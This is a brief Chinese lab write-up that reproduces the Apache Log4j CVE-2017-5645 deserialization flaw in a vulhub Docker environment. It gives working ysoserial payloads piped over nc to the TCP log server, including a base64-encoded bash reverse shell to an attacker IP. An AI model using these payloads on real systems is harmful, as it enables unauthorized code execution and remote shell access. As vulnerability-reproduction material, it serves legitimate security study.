漏洞概述
Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。
环境搭建
这里使用vulhub来搭建环境
https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645
进入目录并启动环境
cd vulhub-master/log4j/CVE-2017-5645/
docker-compose up -d
环境启动后,将在4712端口开启一个TCPServer。
漏洞复现
我们使用ysoserial生成payload,然后直接发送给your-ip:4712端口即可。
扫描二维码关注公众号,回复:
12443085 查看本文章

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "touch /tmp/success" | nc 192.168.204.138 4712
进入容器
docker exec -it 69272f8d8ae8 /bin/bash
执行了命令
再试试反弹shell
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwNC4xMzgvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}" | nc 192.168.204.138 4712
修复建议
升级到安全版本